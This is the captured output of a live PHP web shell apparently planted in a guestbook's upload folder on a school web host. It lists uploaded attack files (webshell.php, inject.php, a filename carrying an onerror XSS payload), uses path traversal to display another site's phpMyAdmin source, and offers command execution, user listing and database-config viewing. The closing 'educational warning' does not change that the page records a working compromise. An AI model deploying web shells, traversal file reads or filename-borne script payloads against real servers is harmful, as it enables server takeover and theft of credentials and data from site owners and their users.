🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../589181.klas4s23.mid-ica.nl/public_html/phpmyadmin/js/src/table/../database/search.js

/**
 * JavaScript functions used on Database Search page
 *
 * @requires    jQuery
 * @requires    js/functions.js
 *
 * @package PhpMyAdmin
 */

/* global makeGrid */ // js/makegrid.js

/**
 * AJAX script for the Database Search page.
 *
 * Actions ajaxified here:
 * Retrieve result of SQL query
 */

/**
 * Unbind all event handlers before tearing down a page
 */
AJAX.registerTeardown('database/search.js', function () {
    $('a.browse_results').off('click');
    $('a.delete_results').off('click');
    $('#buttonGo').off('click');
    $('#togglesearchresultlink').off('click');
    $('#togglequerybox').off('click');
    $('#togglesearchformlink').off('click');
    $('#select_all').off('click');
    $('#unselect_all').off('click');
    $(document).off('submit', '#db_search_form.ajax');
});

AJAX.registerOnload('database/search.js', function () {
    /** Hide the table link in the initial search result */
    var icon = Functions.getImage('s_tbl', '', { 'id': 'table-image' }).toString();
    $('#table-info').prepend(icon).hide();

    /** Hide the browse and deleted results in the new search criteria */
    $('#buttonGo').on('click', function () {
        $('#table-info').hide();
        $('#browse-results').hide();
        $('#sqlqueryform').hide();
        $('#togglequerybox').hide();
    });
    /**
     * Prepare a div containing a link for toggle the search results
     */
    $('#togglesearchresultsdiv')
    /** don't show it until we have results on-screen */
        .hide();

    /**
     * Changing the displayed text according to
     * the hide/show criteria in search result forms
     */
    $('#togglesearchresultlink')
        .html(Messages.strHideSearchResults)
        .on('click', function () {
            var $link = $(this);
            $('#searchresults').slideToggle();
            if ($link.text() === Messages.strHideSearchResults) {
                $link.text(Messages.strShowSearchResults);
            } else {
                $link.text(Messages.strHideSearchResults);
            }
            /** avoid default click action */
            return false;
        });

    /**
     * Prepare a div containing a link for toggle the search form,
     * otherwise it's incorrectly displayed after a couple of clicks
     */
    $('#togglesearchformdiv')
        .hide(); // don't show it until we have results on-screen

    /**
     * Changing the displayed text according to
     * the hide/show criteria in search form
     */
    $('#togglequerybox')
        .hide()
        .on('click', function () {
            var $link = $(this);
            $('#sqlqueryform').slideToggle('medium');
            if ($link.text() === Messages.strHideQueryBox) {
                $link.text(Messages.strShowQueryBox);
            } else {
                $link.text(Messages.strHideQueryBox);
            }
            /** avoid default click action */
            return false;
        });

    /** don't show it until we have results on-screen */

    /**
     * Changing the displayed text according to
     * the hide/show criteria in search criteria form
     */
    $('#togglesearchformlink')
        .html(Messages.strShowSearchCriteria)
        .on('click', function () {
            var $link = $(this);
            $('#db_search_form').slideToggle();
            if ($link.text() === Messages.strHideSearchCriteria) {
                $link.text(Messages.strShowSearchCriteria);
            } else {
                $link.text(Messages.strHideSearchCriteria);
            }
            /** avoid default click action */
            return false;
        });

    /*
     * Ajax Event handler for retrieving the results from a table
     */
    $(document).on('click', 'a.browse_results', function (e) {
        e.preventDefault();
        /**   Hides the results shown by the delete criteria */
        var $msg = Functions.ajaxShowMessage(Messages.strBrowsing, false);
        $('#sqlqueryform').hide();
        $('#togglequerybox').hide();
        /**  Load the browse results to the page */
        $('#table-info').show();
        var tableName = $(this).data('table-name');
        $('#table-link').attr({ 'href' : $(this).attr('href') }).text(tableName);

        var url = $(this).attr('href') + '#searchresults';
        var browseSql = $(this).data('browse-sql');
        var params = {
            'ajax_request': true,
            'is_js_confirmed': true,
            'sql_query' : browseSql
        };
        $.post(url, params, function (data) {
            if (typeof data !== 'undefined' && data.success) {
                $('#browse-results').html(data.message);
                Functions.ajaxRemoveMessage($msg);
                $('.table_results').each(function () {
                    makeGrid(this, true, true, true, true);
                });
                $('#browse-results').show();
                Functions.highlightSql($('#browse-results'));
                $('html, body')
                    .animate({
                        scrollTop: $('#browse-results').offset().top
                    }, 1000);
            } else {
                Functions.ajaxShowMessage(data.error, false);
            }
        });
    });

    /*
     * Ajax Event handler for deleting the results from a table
     */
    $(document).on('click', 'a.delete_results', function (e) {
        e.preventDefault();
        /**  Hides the results shown by the browse criteria */
        $('#table-info').hide();
        $('#sqlqueryform').hide();
        $('#togglequerybox').hide();
        /** Conformation message for deletion */
        var msg = Functions.sprintf(
            Messages.strConfirmDeleteResults,
            $(this).data('table-name')
        );
        if (confirm(msg)) {
            var $msg = Functions.ajaxShowMessage(Messages.strDeleting, false);
            /** Load the deleted option to the page*/
            $('#sqlqueryform').html('');
            var params = {
                'ajax_request': true,
                'is_js_confirmed': true,
                'sql_query': $(this).data('delete-sql')
            };
            var url = $(this).attr('href');

            $.post(url, params, function (data) {
                if (typeof data === 'undefined' || !data.success) {
                    Functions.ajaxShowMessage(data.error, false);
                    return;
                }

                $('#sqlqueryform').html(data.sql_query);
                /** Refresh the search results after the deletion */
                $('#buttonGo').trigger('click');
                $('#togglequerybox').html(Messages.strHideQueryBox);
                /** Show the results of the deletion option */
                $('#browse-results').hide();
                $('#sqlqueryform').show();
                $('#togglequerybox').show();
                $('html, body')
                    .animate({
                        scrollTop: $('#browse-results').offset().top
                    }, 1000);
                Functions.ajaxRemoveMessage($msg);
            });
        }
    });

    /**
     * Ajax Event handler for retrieving the result of an SQL Query
     */
    $(document).on('submit', '#db_search_form.ajax', function (event) {
        event.preventDefault();
        if ($('#criteriaTables :selected').length === 0) {
            Functions.ajaxShowMessage(Messages.strNoTableSelected);
            return;
        }
        var $msgbox = Functions.ajaxShowMessage(Messages.strSearching, false);
        // jQuery object to reuse
        var $form = $(this);

        Functions.prepareForAjaxRequest($form);

        var url = $form.serialize() + CommonParams.get('arg_separator') + 'submit_search=' + $('#buttonGo').val();
        $.post($form.attr('action'), url, function (data) {
            if (typeof data !== 'undefined' && data.success === true) {
                // found results
                $('#searchresults').html(data.message);

                $('#togglesearchresultlink')
                // always start with the Show message
                    .text(Messages.strHideSearchResults);
                $('#togglesearchresultsdiv')
                // now it's time to show the div containing the link
                    .show();
                $('#searchresults').show();


                $('#db_search_form')
                    // workaround for Chrome problem (bug #3168569)
                    .slideToggle()
                    .hide();
                $('#togglesearchformlink')
                    // always start with the Show message
                    .text(Messages.strShowSearchCriteria);
                $('#togglesearchformdiv')
                    // now it's time to show the div containing the link
                    .show();
            } else {
                // error message (zero rows)
                $('#searchresults').html(data.error).show();
            }

            Functions.ajaxRemoveMessage($msgbox);
        });
    });

    $('#select_all').on('click', function () {
        Functions.setSelectOptions('db_search', 'criteriaTables[]', true);
        return false;
    });
    $('#unselect_all').on('click', function () {
        Functions.setSelectOptions('db_search', 'criteriaTables[]', false);
        return false;
    });
}); // end $()

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!